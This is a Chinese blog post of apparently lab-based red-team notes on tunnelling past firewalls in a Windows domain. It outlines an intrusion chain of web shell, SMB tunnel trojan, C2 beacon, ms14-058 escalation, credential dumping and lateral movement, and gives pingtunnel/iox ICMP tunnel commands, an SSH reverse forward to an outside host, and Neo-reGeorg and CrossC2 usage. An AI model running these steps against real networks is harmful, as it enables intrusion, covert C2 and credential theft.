<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="SMB-开防火墙入站只445： 可用于文件打印和共享 smb和上面两个icmp和dns不一样，他是为了解决入站问题 SMB一般在防火墙入站默认是开启的，判断目标端口是否开放 适用场景：防火墙放行的入口打不下利用放行的SMB移动获取权限 利用条件：密码喷射或已知口令的情况下直接正向SMB横向移动拿下 大致流程： 域控192.168.3.21 web服务器ip192.168.3.31 sql服务器ip">
<meta property="og:type" content="article">
<meta property="og:title" content="防火墙开启状态下隧道搭建(二)">
<meta property="og:url" content="https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/index.html">
<meta property="og:site_name" content="Ca1m">
<meta property="og:description" content="SMB-开防火墙入站只445： 可用于文件打印和共享 smb和上面两个icmp和dns不一样，他是为了解决入站问题 SMB一般在防火墙入站默认是开启的，判断目标端口是否开放 适用场景：防火墙放行的入口打不下利用放行的SMB移动获取权限 利用条件：密码喷射或已知口令的情况下直接正向SMB横向移动拿下 大致流程： 域控192.168.3.21 web服务器ip192.168.3.31 sql服务器ip">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740553835240-a5f1ea2b-e79f-4bfa-aa33-fa8d6b6b0866.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740747053037-f1df8b69-266e-4ab7-aef9-33f929da9506.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740747067333-4120b7ec-50e9-46cb-b90b-0bcb5e1b663b.png">
<meta property="article:published_time" content="2024-10-04T16:51:29.000Z">
<meta property="article:modified_time" content="2025-03-04T03:40:38.882Z">
<meta property="article:author" content="Ca1m">
<meta property="article:tag" content="域">
<meta property="article:tag" content="隧道">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740553835240-a5f1ea2b-e79f-4bfa-aa33-fa8d6b6b0866.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>防火墙开启状态下隧道搭建(二)</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/friends/">friends</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/11/01/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/sql%E6%B3%A8%E5%85%A5/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/04/%E5%9F%9F/%E9%9A%A7%E9%81%931/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&text=防火墙开启状态下隧道搭建(二)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&is_video=false&description=防火墙开启状态下隧道搭建(二)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=防火墙开启状态下隧道搭建(二)&body=Check out this article: https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&name=防火墙开启状态下隧道搭建(二)&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&t=防火墙开启状态下隧道搭建(二)"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMB-%E5%BC%80%E9%98%B2%E7%81%AB%E5%A2%99%E5%85%A5%E7%AB%99%E5%8F%AA445%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">SMB-开防火墙入站只445：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E3%80%812%E5%9C%BA%E6%99%AF%E5%90%8E%E7%BB%AD%E7%A9%BF%E9%80%8F%E9%97%AE%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">1、2场景后续穿透问题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA%E4%B8%8A%E7%BA%BFC2%EF%BC%9A%EF%BC%88%E8%A7%A3%E5%86%B3%E7%9B%AE%E6%A0%87%E5%87%BA%E7%AB%99%E9%99%90%E5%88%B6%E4%B8%8A%E7%BA%BFC2%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">HTTP隧道搭建上线C2：（解决目标出站限制上线C2）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%EF%BC%9A%EF%BC%88%E8%A7%A3%E5%86%B3%E7%9B%AE%E6%A0%87%E5%87%BA%E7%AB%99%E9%99%90%E5%88%B6%E5%81%9A%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%EF%BC%89"><span class="toc-number">4.</span> <span class="toc-text">SSH隧道搭建内网穿透：（解决目标出站限制做信息收集）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E4%B8%8A%E7%BA%BF-%E6%8F%92%E4%BB%B6-Linux-Mac-IOS-Android"><span class="toc-number">4.1.</span> <span class="toc-text">控制上线-插件-Linux&amp;Mac&amp;IOS&amp;Android</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        防火墙开启状态下隧道搭建(二)
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Ca1m</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-10-04T16:51:29.000Z" class="dt-published" itemprop="datePublished">2024-10-05</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E5%86%85%E7%BD%91%E6%94%BB%E9%98%B2/">内网攻防</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E5%9F%9F/" rel="tag">域</a>, <a class="p-category" href="/tags/%E9%9A%A7%E9%81%93/" rel="tag">隧道</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="SMB-开防火墙入站只445："><a href="#SMB-开防火墙入站只445：" class="headerlink" title="SMB-开防火墙入站只445："></a>SMB-开防火墙入站只445：</h3><p><img src="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740553835240-a5f1ea2b-e79f-4bfa-aa33-fa8d6b6b0866.png"></p>
<p>可用于文件打印和共享</p>
<p>smb和上面两个icmp和dns不一样，他是为了解决入站问题</p>
<p>SMB一般在防火墙入站默认是开启的，判断目标端口是否开放</p>
<p>适用场景：防火墙放行的入口打不下利用放行的SMB移动获取权限</p>
<p>利用条件：密码喷射或已知口令的情况下直接正向SMB横向移动拿下</p>
<p>大致流程：</p>
<p>域控192.168.3.21</p>
<p>web服务器ip192.168.3.31</p>
<p>sql服务器ip 192.168.3.33</p>
<p>web服务器开放445端口，web服务器拿到shell之后，上传smb隧道木马，c2上线，ms14-058提权从webadmin到system，再cs获取密码凭证，再新建web反向监听地址192.168.3.31端口为6666 ,再横向到3.33，web服务器中转代理当作跳板机</p>
<h3 id="1、2场景后续穿透问题"><a href="#1、2场景后续穿透问题" class="headerlink" title="1、2场景后续穿透问题"></a>1、2场景后续穿透问题</h3><p>1、Pingtunel配合iox代理Socks内网穿透</p>
<p>2、dnscat2（DNS）配合上线</p>
<p>C2:</p>
<p>接收客户端传递的ICMP</p>
<p>.&#x2F;pingtunnel -type server -noprint 1 -nolog 1 -key 000000</p>
<p>将本地4455转至5566端口</p>
<p>.&#x2F;iox proxy -l 4455 -l 5566</p>
<p>Web</p>
<p>将本地2222的TCP封装IMCP给192.168.139.141:4455</p>
<p>pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000</p>
<p>建立SockS节点绑定2222端口：</p>
<p>iox.exe proxy -r 127.0.0.1:2222</p>
<p>此时在windows上proxifier可以加载节点配置就可以访问web服务<br><img src="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740747053037-f1df8b69-266e-4ab7-aef9-33f929da9506.png"></p>
<p>-项目Neo-reGeorg</p>
<p><a target="_blank" rel="noopener" href="https://github.com/L-codes/Neo-reGeorg">https://github.com/L-codes/Neo-reGeorg</a></p>
<p>工具使用：</p>
<p>1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传</p>
<p>2、使用neoreg.py连接WEB服务器，在本地建立连接</p>
<p>3、Proxifier添加socks5服务器并配置连接规则测试</p>
<p>同类推荐项目：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/zema1/suo5">https://github.com/zema1/suo5</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/nccgroup/ABPTTS">https://github.com/nccgroup/ABPTTS</a></p>
<p>-哥斯拉&amp;冰蝎</p>
<p>哥斯拉：HttpProxy</p>
<p>冰蝎：内网穿透</p>
<h3 id="HTTP隧道搭建上线C2：（解决目标出站限制上线C2）"><a href="#HTTP隧道搭建上线C2：（解决目标出站限制上线C2）" class="headerlink" title="HTTP隧道搭建上线C2：（解决目标出站限制上线C2）"></a>HTTP隧道搭建上线C2：（解决目标出站限制上线C2）</h3><p>太多时候遇到目标不出网了，TCP、ICMP、DNS协议均不通，</p>
<p>无法直接与公网的CS&#x2F;MSF&#x2F;Sliverd等其他C2服务端建立连接。</p>
<p>1、内网穿透建立HTTP隧道穿透</p>
<p>2、将远程IP正向后门端口转发本地端口</p>
<p>3、CS生成绑定正向后门，连接本地端口</p>
<h3 id="SSH隧道搭建内网穿透：（解决目标出站限制做信息收集）"><a href="#SSH隧道搭建内网穿透：（解决目标出站限制做信息收集）" class="headerlink" title="SSH隧道搭建内网穿透：（解决目标出站限制做信息收集）"></a>SSH隧道搭建内网穿透：（解决目标出站限制做信息收集）</h3><p><img src="https://cdn.nlark.com/yuque/0/2025/png/25663185/1740747067333-4120b7ec-50e9-46cb-b90b-0bcb5e1b663b.png"></p>
<p>注：由于CS无SSH协议监听器配置，无法上线</p>
<p>1、环境复现搭建：</p>
<p>如：模拟Linux为被控机，配置防火墙策略</p>
<p>iptables -F &#x2F;* 清除所有规则 *&#x2F;</p>
<p>iptables -AINPUT -p tcp –dport 22 -j ACCEPT &#x2F;<em>允许包从22端口进入</em>&#x2F;</p>
<p>iptables -AOUTPUT -p tcp –sport 22 -m state –state ESTABLISHED -j ACCEPT &#x2F;<em>允许从22端口进入的包返回</em>&#x2F;</p>
<p>iptables -AOUTPUT -p udp –dport 53 -j ACCEPT &#x2F;* 域名解析端口，一般不开 *&#x2F;</p>
<p>iptables -AINPUT -p udp –sport 53 -j ACCEPT &#x2F;* 域名解析端口，一般不开 *&#x2F;</p>
<p>iptables -AINPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT &#x2F;<em>允许本机访问本机</em>&#x2F;</p>
<p>iptables -AOUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT</p>
<p>iptables -AINPUT -p tcp -s 0&#x2F;0 –dport 80 -j ACCEPT &#x2F;<em>允许所有IP访问80端口</em>&#x2F;</p>
<p>iptables -AOUTPUT -p tcp –sport 80 -m state –state ESTABLISHED -j ACCEPT</p>
<p>iptables-save &gt; &#x2F;etc&#x2F;sysconfig&#x2F;iptables &#x2F;<em>保存配置</em>&#x2F;</p>
<p>iptables -L &#x2F;* 显示iptables列表 *&#x2F;</p>
<p>如：模拟Windows为被控机，配置防火墙策略：SSH22端口放行</p>
<p>自己的服务器记得开启ssh协议登录：</p>
<p>vi &#x2F;etc&#x2F;ssh&#x2F;sshd_config</p>
<p>PermitRootLogin yes</p>
<p>PasswordAuthentication yes</p>
<p>&#x2F;etc&#x2F;init.d&#x2F;ssh start</p>
<p>&#x2F;etc&#x2F;init.d&#x2F;ssh restart</p>
<p>2、适用场景：</p>
<p>内网主机防火墙限制了出网协议，可以利用SSH转发流量实现内网穿透</p>
<p>3、需要条件：（解决目标出站限制）</p>
<p>被控主机需支持SSH协议（Windows需要安装支持软件）</p>
<p>将2.22上80端口流量转发到xx.xx上的1234端口</p>
<p>ssh -CfNg -R1234:192.168.2.22:80 <a href="mailto:&#x72;&#111;&#x6f;&#x74;&#64;&#x78;&#x78;&#46;&#120;&#x78;&#x2e;&#x78;&#120;&#46;&#120;&#x78;">&#x72;&#111;&#x6f;&#x74;&#64;&#x78;&#x78;&#46;&#120;&#x78;&#x2e;&#x78;&#120;&#46;&#120;&#x78;</a></p>
<p>curL <a target="_blank" rel="noopener" href="http://127.0.0.1:1234/">http://127.0.0.1:1234</a></p>
<h4 id="控制上线-插件-Linux-Mac-IOS-Android"><a href="#控制上线-插件-Linux-Mac-IOS-Android" class="headerlink" title="控制上线-插件-Linux&amp;Mac&amp;IOS&amp;Android"></a>控制上线-插件-Linux&amp;Mac&amp;IOS&amp;Android</h4><p><a target="_blank" rel="noopener" href="https://github.com/gloxec/CrossC2">https://github.com/gloxec/CrossC2</a></p>
<p>面向Linux Mac IOS Android系统上线支持</p>
<p>1、插件使用</p>
<p>2、命令使用</p>
<p>使用参考：</p>
<p><a target="_blank" rel="noopener" href="https://gloxec.github.io/CrossC2/zh_cn/">https://gloxec.github.io/CrossC2/zh_cn/</a></p>
<p>目前版本只支持反向的https和正向的tcp</p>
<p>1、下载对应版本加载器和CNA插件</p>
<p>2、上传加载器文件和本地加载CNA插件</p>
<p>3、修改CNA插件配置路径及上传Key文件</p>
<p>4、使用命令或插件绑定HTTPS监听器生成</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">categories</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/friends/">friends</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMB-%E5%BC%80%E9%98%B2%E7%81%AB%E5%A2%99%E5%85%A5%E7%AB%99%E5%8F%AA445%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">SMB-开防火墙入站只445：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E3%80%812%E5%9C%BA%E6%99%AF%E5%90%8E%E7%BB%AD%E7%A9%BF%E9%80%8F%E9%97%AE%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">1、2场景后续穿透问题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA%E4%B8%8A%E7%BA%BFC2%EF%BC%9A%EF%BC%88%E8%A7%A3%E5%86%B3%E7%9B%AE%E6%A0%87%E5%87%BA%E7%AB%99%E9%99%90%E5%88%B6%E4%B8%8A%E7%BA%BFC2%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">HTTP隧道搭建上线C2：（解决目标出站限制上线C2）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E9%9A%A7%E9%81%93%E6%90%AD%E5%BB%BA%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%EF%BC%9A%EF%BC%88%E8%A7%A3%E5%86%B3%E7%9B%AE%E6%A0%87%E5%87%BA%E7%AB%99%E9%99%90%E5%88%B6%E5%81%9A%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%EF%BC%89"><span class="toc-number">4.</span> <span class="toc-text">SSH隧道搭建内网穿透：（解决目标出站限制做信息收集）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E4%B8%8A%E7%BA%BF-%E6%8F%92%E4%BB%B6-Linux-Mac-IOS-Android"><span class="toc-number">4.1.</span> <span class="toc-text">控制上线-插件-Linux&amp;Mac&amp;IOS&amp;Android</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&text=防火墙开启状态下隧道搭建(二)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&is_video=false&description=防火墙开启状态下隧道搭建(二)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=防火墙开启状态下隧道搭建(二)&body=Check out this article: https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&title=防火墙开启状态下隧道搭建(二)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&name=防火墙开启状态下隧道搭建(二)&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ca1msec.github.io/2024/10/05/%E5%9F%9F/%E9%9A%A7%E9%81%932/&t=防火墙开启状态下隧道搭建(二)"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Ca1m
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/friends/">friends</a></li><!--
     -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
          <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'owner/githubrepo';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
